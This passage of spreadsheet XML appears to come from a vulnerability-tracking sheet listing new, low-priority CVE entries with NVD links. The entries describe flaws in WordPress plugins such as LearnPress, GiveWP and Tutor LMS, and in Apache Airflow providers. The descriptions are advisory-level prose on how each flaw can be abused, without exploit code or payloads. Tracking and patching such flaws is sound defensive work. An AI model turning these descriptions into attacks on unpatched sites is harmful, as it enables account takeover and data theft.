      <c r="K1499" s="5" t="inlineStr"/>
      <c r="L1499" s="5" t="inlineStr"/>
      <c r="M1499" s="5" t="inlineStr"/>
      <c r="N1499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1499" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1499" s="5" t="inlineStr"/>
      <c r="Q1499" s="5" t="inlineStr"/>
      <c r="R1499" s="5" t="inlineStr">
        <is>
          <t>The Optimole  WordPress plugin before 4.2.12 does not properly escape a user supplied value before using it to build an image tag attribute, allowing unauthenticated users to inject arbitrary attributes into pages served to every visitor, which leads to Stored Cross-Site Scripting.</t>
        </is>
      </c>
      <c r="S1499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84829</t>
        </is>
      </c>
    </row>
    <row r="1500">
      <c r="A1500" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84905</t>
        </is>
      </c>
      <c r="D1500" s="5" t="inlineStr"/>
      <c r="E1500" s="5" t="inlineStr"/>
      <c r="F1500" s="5" t="inlineStr"/>
      <c r="G1500" s="5" t="inlineStr"/>
      <c r="H1500" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1500" s="5" t="inlineStr"/>
      <c r="J1500" s="5" t="inlineStr"/>
      <c r="K1500" s="5" t="inlineStr"/>
      <c r="L1500" s="5" t="inlineStr"/>
      <c r="M1500" s="5" t="inlineStr"/>
      <c r="N1500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1500" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1500" s="5" t="inlineStr"/>
      <c r="Q1500" s="5" t="inlineStr"/>
      <c r="R1500" s="5" t="inlineStr">
        <is>
          <t>The Eventin  WordPress plugin before 4.1.24 does not verify a user's capability to create accounts when adding a speaker, allowing users with contributor-level access and above to create new WordPress user accounts that carry capabilities beyond their own, including publishing content and uploading files, and, by supplying an email address they control, to obtain a working login to the created account.</t>
        </is>
      </c>
      <c r="S1500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84905</t>
        </is>
      </c>
    </row>
    <row r="1501">
      <c r="A1501" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84907</t>
        </is>
      </c>
      <c r="D1501" s="5" t="inlineStr"/>
      <c r="E1501" s="5" t="inlineStr"/>
      <c r="F1501" s="5" t="inlineStr"/>
      <c r="G1501" s="5" t="inlineStr"/>
      <c r="H1501" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1501" s="5" t="inlineStr"/>
      <c r="J1501" s="5" t="inlineStr"/>
      <c r="K1501" s="5" t="inlineStr"/>
      <c r="L1501" s="5" t="inlineStr"/>
      <c r="M1501" s="5" t="inlineStr"/>
      <c r="N1501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1501" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1501" s="5" t="inlineStr"/>
      <c r="Q1501" s="5" t="inlineStr"/>
      <c r="R1501" s="5" t="inlineStr">
        <is>
          <t>The Eventin  WordPress plugin before 4.1.24 does not properly authorise order finalisation when its offline (local) payment method is enabled, relying on a nonce that is exposed to unauthenticated visitors and never checking that the caller owns the order, allowing unauthenticated attackers to reset any existing order and its attendees to a pending state and thereby invalidate paid tickets.</t>
        </is>
      </c>
      <c r="S1501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84907</t>
        </is>
      </c>
    </row>
    <row r="1502">
      <c r="A1502" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85131</t>
        </is>
      </c>
      <c r="D1502" s="5" t="inlineStr"/>
      <c r="E1502" s="5" t="inlineStr"/>
      <c r="F1502" s="5" t="inlineStr"/>
      <c r="G1502" s="5" t="inlineStr"/>
      <c r="H1502" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1502" s="5" t="inlineStr"/>
      <c r="J1502" s="5" t="inlineStr"/>
      <c r="K1502" s="5" t="inlineStr"/>
      <c r="L1502" s="5" t="inlineStr"/>
      <c r="M1502" s="5" t="inlineStr"/>
      <c r="N1502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1502" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1502" s="5" t="inlineStr"/>
      <c r="Q1502" s="5" t="inlineStr"/>
      <c r="R1502" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.4 does not perform CSRF or capability checks when processing bulk actions on its administration screens, and does not restrict the targeted items to its own records, allowing attackers to make a logged in admin permanently delete arbitrary posts and pages via a crafted request.</t>
        </is>
      </c>
      <c r="S1502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85131</t>
        </is>
      </c>
    </row>
    <row r="1503">
      <c r="A1503" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85349</t>
        </is>
      </c>
      <c r="D1503" s="5" t="inlineStr"/>
      <c r="E1503" s="5" t="inlineStr"/>
      <c r="F1503" s="5" t="inlineStr"/>
      <c r="G1503" s="5" t="inlineStr"/>
      <c r="H1503" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1503" s="5" t="inlineStr"/>
      <c r="J1503" s="5" t="inlineStr"/>
      <c r="K1503" s="5" t="inlineStr"/>
      <c r="L1503" s="5" t="inlineStr"/>
      <c r="M1503" s="5" t="inlineStr"/>
      <c r="N1503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1503" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1503" s="5" t="inlineStr"/>
      <c r="Q1503" s="5" t="inlineStr"/>
      <c r="R1503" s="5" t="inlineStr">
        <is>
          <t>The FluentBoards  WordPress plugin before 2.0.15 does not properly verify authorization when returning the list of boards a user belongs to, allowing any authenticated user, including a Subscriber with no board access, to disclose the private board memberships of arbitrary users by referencing their user ID.</t>
        </is>
      </c>
      <c r="S1503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85349</t>
        </is>
      </c>
    </row>
    <row r="1504">
      <c r="A1504" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85530</t>
        </is>
      </c>
      <c r="D1504" s="5" t="inlineStr"/>
      <c r="E1504" s="5" t="inlineStr"/>
      <c r="F1504" s="5" t="inlineStr"/>
      <c r="G1504" s="5" t="inlineStr"/>
      <c r="H1504" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1504" s="5" t="inlineStr"/>
      <c r="J1504" s="5" t="inlineStr"/>
      <c r="K1504" s="5" t="inlineStr"/>
      <c r="L1504" s="5" t="inlineStr"/>
      <c r="M1504" s="5" t="inlineStr"/>
      <c r="N1504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1504" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1504" s="5" t="inlineStr"/>
      <c r="Q1504" s="5" t="inlineStr"/>
      <c r="R1504" s="5" t="inlineStr">
        <is>
          <t>The GiveWP  WordPress plugin before 4.16.8.1 does not consistently normalise a donor's e-mail address between the value it stores and the value it later uses to look that donor up, allowing unauthenticated users to be resolved as an arbitrary donor and to set the WordPress password of any user account linked to one, including an administrator's.</t>
        </is>
      </c>
      <c r="S1504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85530</t>
        </is>
      </c>
    </row>
    <row r="1505">
      <c r="A1505" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85569</t>
        </is>
      </c>
      <c r="D1505" s="5" t="inlineStr"/>
      <c r="E1505" s="5" t="inlineStr"/>
      <c r="F1505" s="5" t="inlineStr"/>
      <c r="G1505" s="5" t="inlineStr"/>
      <c r="H1505" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1505" s="5" t="inlineStr"/>
      <c r="J1505" s="5" t="inlineStr"/>
      <c r="K1505" s="5" t="inlineStr"/>
      <c r="L1505" s="5" t="inlineStr"/>
      <c r="M1505" s="5" t="inlineStr"/>
      <c r="N1505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1505" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1505" s="5" t="inlineStr"/>
      <c r="Q1505" s="5" t="inlineStr"/>
      <c r="R1505" s="5" t="inlineStr">
        <is>
          <t>The Tutor LMS  WordPress plugin before 4.0.8 does not correctly determine whether an incoming request is addressed to its own REST API, and does not enforce the permission recorded against an API credential, allowing the holder of a read-only key to act as the administrator account that issued it.</t>
        </is>
      </c>
      <c r="S1505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85569</t>
        </is>
      </c>
    </row>
    <row r="1506">
      <c r="A1506" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85572</t>
        </is>
      </c>
      <c r="D1506" s="5" t="inlineStr"/>
      <c r="E1506" s="5" t="inlineStr"/>
      <c r="F1506" s="5" t="inlineStr"/>
      <c r="G1506" s="5" t="inlineStr"/>
      <c r="H1506" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1506" s="5" t="inlineStr"/>
      <c r="J1506" s="5" t="inlineStr"/>
      <c r="K1506" s="5" t="inlineStr"/>
      <c r="L1506" s="5" t="inlineStr"/>
      <c r="M1506" s="5" t="inlineStr"/>
      <c r="N1506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1506" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1506" s="5" t="inlineStr"/>
      <c r="Q1506" s="5" t="inlineStr"/>
      <c r="R1506" s="5" t="inlineStr">
        <is>
          <t>The Tutor LMS  WordPress plugin before 4.0.8 does not check that a user has access to a course before returning its lesson discussion content, allowing any authenticated user, such as a subscriber, to read comments from courses they are not enrolled in, including comments awaiting moderation.</t>
        </is>
      </c>
      <c r="S1506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85572</t>
        </is>
      </c>
    </row>
    <row r="1507">
      <c r="A1507" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85641</t>
        </is>
      </c>
      <c r="D1507" s="5" t="inlineStr"/>
      <c r="E1507" s="5" t="inlineStr"/>
      <c r="F1507" s="5" t="inlineStr"/>
      <c r="G1507" s="5" t="inlineStr"/>
      <c r="H1507" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1507" s="5" t="inlineStr"/>
      <c r="J1507" s="5" t="inlineStr"/>
      <c r="K1507" s="5" t="inlineStr"/>
      <c r="L1507" s="5" t="inlineStr"/>
      <c r="M1507" s="5" t="inlineStr"/>
      <c r="N1507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1507" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1507" s="5" t="inlineStr"/>
      <c r="Q1507" s="5" t="inlineStr"/>
      <c r="R1507" s="5" t="inlineStr">
        <is>
          <t>The Formidable Forms  WordPress plugin before 6.35 does not restrict who can set the identifier recording which user last edited a form entry, and relies on that identifier when deciding whether to strip HTML from stored entry values, allowing unauthenticated visitors to have markup rendered in the admin entry view that would otherwise be removed, and to attribute their submission to an administrator who never made it.</t>
        </is>
      </c>
      <c r="S1507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85641</t>
        </is>
      </c>
    </row>
    <row r="1508">
      <c r="A1508" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85789</t>
        </is>
      </c>
      <c r="D1508" s="5" t="inlineStr"/>
      <c r="E1508" s="5" t="inlineStr"/>
      <c r="F1508" s="5" t="inlineStr"/>
      <c r="G1508" s="5" t="inlineStr"/>
      <c r="H1508" s="5" t="inlineStr"/>
      <c r="I1508" s="5" t="inlineStr"/>
      <c r="J1508" s="5" t="inlineStr"/>
      <c r="K1508" s="5" t="inlineStr"/>
      <c r="L1508" s="5" t="inlineStr"/>
      <c r="M1508" s="5" t="inlineStr"/>
      <c r="N1508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1508" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1508" s="5" t="inlineStr"/>
      <c r="Q1508" s="5" t="inlineStr"/>
      <c r="R1508" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="S1508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85789</t>
        </is>
      </c>
    </row>
    <row r="1509">
      <c r="A1509" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86444</t>
        </is>
      </c>
      <c r="D1509" s="5" t="inlineStr"/>
      <c r="E1509" s="5" t="inlineStr"/>
      <c r="F1509" s="5" t="inlineStr"/>
      <c r="G1509" s="5" t="inlineStr"/>
      <c r="H1509" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1509" s="5" t="inlineStr"/>
      <c r="J1509" s="5" t="inlineStr"/>
      <c r="K1509" s="5" t="inlineStr"/>
      <c r="L1509" s="5" t="inlineStr"/>
      <c r="M1509" s="5" t="inlineStr"/>
      <c r="N1509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1509" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1509" s="5" t="inlineStr"/>
      <c r="Q1509" s="5" t="inlineStr"/>
      <c r="R1509" s="5" t="inlineStr">
        <is>
          <t>The LearnPress  WordPress plugin before 4.4.7 does not escape a user supplied value before using it in an HTML attribute on a public page, allowing unauthenticated attackers to execute arbitrary JavaScript in the browser of anyone who opens a crafted link, including a logged in administrator. Only sites running a classic, non-block  are affected.</t>
        </is>
      </c>
      <c r="S1509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86444</t>
        </is>
      </c>
    </row>
    <row r="1510">
      <c r="A1510" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86445</t>
        </is>
      </c>
      <c r="D1510" s="5" t="inlineStr"/>
      <c r="E1510" s="5" t="inlineStr"/>
      <c r="F1510" s="5" t="inlineStr"/>
      <c r="G1510" s="5" t="inlineStr"/>
      <c r="H1510" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1510" s="5" t="inlineStr"/>
      <c r="J1510" s="5" t="inlineStr"/>
      <c r="K1510" s="5" t="inlineStr"/>
      <c r="L1510" s="5" t="inlineStr"/>
      <c r="M1510" s="5" t="inlineStr"/>
      <c r="N1510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1510" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1510" s="5" t="inlineStr"/>
      <c r="Q1510" s="5" t="inlineStr"/>
      <c r="R1510" s="5" t="inlineStr">
        <is>
          <t>The LearnPress  WordPress plugin before 4.4.7 does not check the user's capabilities in one of its administrative template handlers, allowing unauthenticated attackers to retrieve the text, identifier and type of every published quiz question on the site, along with a keyword search over them, which is content the LearnPress  WordPress plugin before 4.4.7 otherwise keeps non-public.</t>
        </is>
      </c>
      <c r="S1510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86445</t>
        </is>
      </c>
    </row>
    <row r="1511">
      <c r="A1511" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86447</t>
        </is>
      </c>
      <c r="D1511" s="5" t="inlineStr"/>
      <c r="E1511" s="5" t="inlineStr"/>
      <c r="F1511" s="5" t="inlineStr"/>
      <c r="G1511" s="5" t="inlineStr"/>
      <c r="H1511" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1511" s="5" t="inlineStr"/>
      <c r="J1511" s="5" t="inlineStr"/>
      <c r="K1511" s="5" t="inlineStr"/>
      <c r="L1511" s="5" t="inlineStr"/>
      <c r="M1511" s="5" t="inlineStr"/>
      <c r="N1511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1511" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1511" s="5" t="inlineStr"/>
      <c r="Q1511" s="5" t="inlineStr"/>
      <c r="R1511" s="5" t="inlineStr">
        <is>
          <t>The LearnPress  WordPress plugin before 4.4.7 does not check the user's capabilities in one of its administrative course tools, allowing unauthenticated attackers to list every enrolled student's display name and user identifier against the course they are enrolled on, and to recover their email addresses through the same handler's search filter.</t>
        </is>
      </c>
      <c r="S1511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86447</t>
        </is>
      </c>
    </row>
    <row r="1512">
      <c r="A1512" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86448</t>
        </is>
      </c>
      <c r="D1512" s="5" t="inlineStr"/>
      <c r="E1512" s="5" t="inlineStr"/>
      <c r="F1512" s="5" t="inlineStr"/>
      <c r="G1512" s="5" t="inlineStr"/>
      <c r="H1512" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1512" s="5" t="inlineStr"/>
      <c r="J1512" s="5" t="inlineStr"/>
      <c r="K1512" s="5" t="inlineStr"/>
      <c r="L1512" s="5" t="inlineStr"/>
      <c r="M1512" s="5" t="inlineStr"/>
      <c r="N1512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1512" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1512" s="5" t="inlineStr"/>
      <c r="Q1512" s="5" t="inlineStr"/>
      <c r="R1512" s="5" t="inlineStr">
        <is>
          <t>The LearnPress  WordPress plugin before 4.4.7 does not perform any authentication, capability or nonce check before serving a previously generated order export file, allowing unauthenticated attackers who can determine its identifier to download customer names, purchases, amounts and guest email addresses.</t>
        </is>
      </c>
      <c r="S1512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86448</t>
        </is>
      </c>
    </row>
    <row r="1513">
      <c r="A1513" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86449</t>
        </is>
      </c>
      <c r="D1513" s="5" t="inlineStr"/>
      <c r="E1513" s="5" t="inlineStr"/>
      <c r="F1513" s="5" t="inlineStr"/>
      <c r="G1513" s="5" t="inlineStr"/>
      <c r="H1513" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1513" s="5" t="inlineStr"/>
      <c r="J1513" s="5" t="inlineStr"/>
      <c r="K1513" s="5" t="inlineStr"/>
      <c r="L1513" s="5" t="inlineStr"/>
      <c r="M1513" s="5" t="inlineStr"/>
      <c r="N1513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1513" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1513" s="5" t="inlineStr"/>
      <c r="Q1513" s="5" t="inlineStr"/>
      <c r="R1513" s="5" t="inlineStr">
        <is>
          <t>The LearnPress  WordPress plugin before 4.4.7 does not check the user's capabilities before applying a user supplied post status filter in one of its REST routes, allowing unauthenticated attackers to list courses that are not published, including draft, pending, private, scheduled and trashed ones.</t>
        </is>
      </c>
      <c r="S1513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86449</t>
        </is>
      </c>
    </row>
    <row r="1514">
      <c r="A1514" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86462</t>
        </is>
      </c>
      <c r="D1514" s="5" t="inlineStr"/>
      <c r="E1514" s="5" t="inlineStr"/>
      <c r="F1514" s="5" t="inlineStr"/>
      <c r="G1514" s="5" t="inlineStr"/>
      <c r="H1514" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1514" s="5" t="inlineStr"/>
      <c r="J1514" s="5" t="inlineStr"/>
      <c r="K1514" s="5" t="inlineStr"/>
      <c r="L1514" s="5" t="inlineStr"/>
      <c r="M1514" s="5" t="inlineStr"/>
      <c r="N1514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1514" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1514" s="5" t="inlineStr"/>
      <c r="Q1514" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R1514" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow FAB provider: changing a user's password through the Admin user-edit PATCH endpoint does not invalidate that user's existing database-backed sessions. An attacker who already holds a copy of the victim's session cookie keeps full access as that user after the password change, so the password reset does not evict them. Affects deployments using the FAB auth manager with database-backed sessions; an administrator (or the user themselves) performing a routine password change is the trigger, and no attacker interaction with the endpoint is needed.
This is a second, independent route to the outcome addressed by CVE-2026-82311, which corrected an identifier comparison in the session-invalidation helper. That fix does not repair this endpoint, because the PATCH path never calls the helper at all. Deployments that applied the CVE-2026-82311 fix must also upgrade for this one.
Users of apache-airflow-providers-fab are recommended to upgrade to version 3.9.0 or later, which fixes the issue.</t>
        </is>
      </c>
      <c r="S1514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86462</t>
        </is>
      </c>
    </row>
    <row r="1515">
      <c r="A1515" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86465</t>
        </is>
      </c>
      <c r="D1515" s="5" t="inlineStr"/>
      <c r="E1515" s="5" t="inlineStr"/>
      <c r="F1515" s="5" t="inlineStr"/>
      <c r="G1515" s="5" t="inlineStr"/>
      <c r="H1515" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1515" s="5" t="inlineStr"/>
      <c r="J1515" s="5" t="inlineStr"/>
      <c r="K1515" s="5" t="inlineStr"/>
      <c r="L1515" s="5" t="inlineStr"/>
      <c r="M1515" s="5" t="inlineStr"/>
      <c r="N1515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1515" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1515" s="5" t="inlineStr"/>
      <c r="Q1515" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1515" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow Akeyless provider: the Akeyless secrets backend's team-scope guard can be bypassed with a user-controlled key. In a multi-team deployment, a Dag author scoped to one team can supply a Variable key containing a path separator that causes the backend to resolve a secret belonging to a different team, because the lookup path is concatenated from an unvalidated key after the team-scoped lookup misses. The Execution API Variables route accepts a path-shaped key, so this is reachable from ordinary Dag code.
Affects multi-team deployments using the Akeyless secrets backend. Single-team deployments are not affected, as there is no cross-team boundary to cross. This is the same class as CVE-2026-68870, CVE-2026-68871 and CVE-2026-68872 in the Azure Key Vault, Yandex Lockbox and Amazon secrets backends.
Users of apache-airflow-providers-akeyless are recommended to upgrade to version 0.3.1 or later, which fixes the issue.</t>
        </is>
      </c>
      <c r="S1515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86465</t>
        </is>
      </c>
    </row>
    <row r="1516">
      <c r="A1516" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1516" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86466</t>
        </is>
      </c>
      <c r="D1516" s="5" t="inlineStr"/>
      <c r="E1516" s="5" t="inlineStr"/>
      <c r="F1516" s="5" t="inlineStr"/>
      <c r="G1516" s="5" t="inlineStr"/>
      <c r="H1516" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1516" s="5" t="inlineStr"/>
      <c r="J1516" s="5" t="inlineStr"/>
      <c r="K1516" s="5" t="inlineStr"/>
      <c r="L1516" s="5" t="inlineStr"/>
      <c r="M1516" s="5" t="inlineStr"/>
      <c r="N1516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1516" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1516" s="5" t="inlineStr"/>
      <c r="Q1516" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R1516" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow FAB provider: the Authentik OAuth path in the FAB auth manager does not validate the issuer or audience claims of the id_token it accepts. An attacker holding a token that the same Authentik identity provider minted for a different client application can present it to Airflow and be authenticated as the user it names, because the audience claim is never checked. Affects deployments using the FAB auth manager with Authentik OAuth where the same Authentik instance also serves other applications; the attacker needs a valid token for any of those other applications, not for Airflow.
CVE-2026-75156 corrected the same missing validation on the Azure AD path in this file; the Authentik path was left unchanged and is fixed here. Deployments that applied the CVE-2026-75156 fix and use Authentik must also upgrade for this one.
Users of apache-airflow-providers-fab are recommended to upgrade to version 3.9.0 or later, which fixes the issue.</t>
        </is>
      </c>
      <c r="S1516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86466</t>
        </is>
      </c>
    </row>
    <row r="1517">
      <c r="A1517" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86784</t>
        </is>
      </c>
      <c r="D1517" s="5" t="inlineStr"/>
      <c r="E1517" s="5" t="inlineStr"/>
      <c r="F1517" s="5" t="inlineStr"/>
      <c r="G1517" s="5" t="inlineStr"/>
      <c r="H1517" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1517" s="5" t="inlineStr"/>
      <c r="J1517" s="5" t="inlineStr"/>
      <c r="K1517" s="5" t="inlineStr"/>
      <c r="L1517" s="5" t="inlineStr"/>
      <c r="M1517" s="5" t="inlineStr"/>
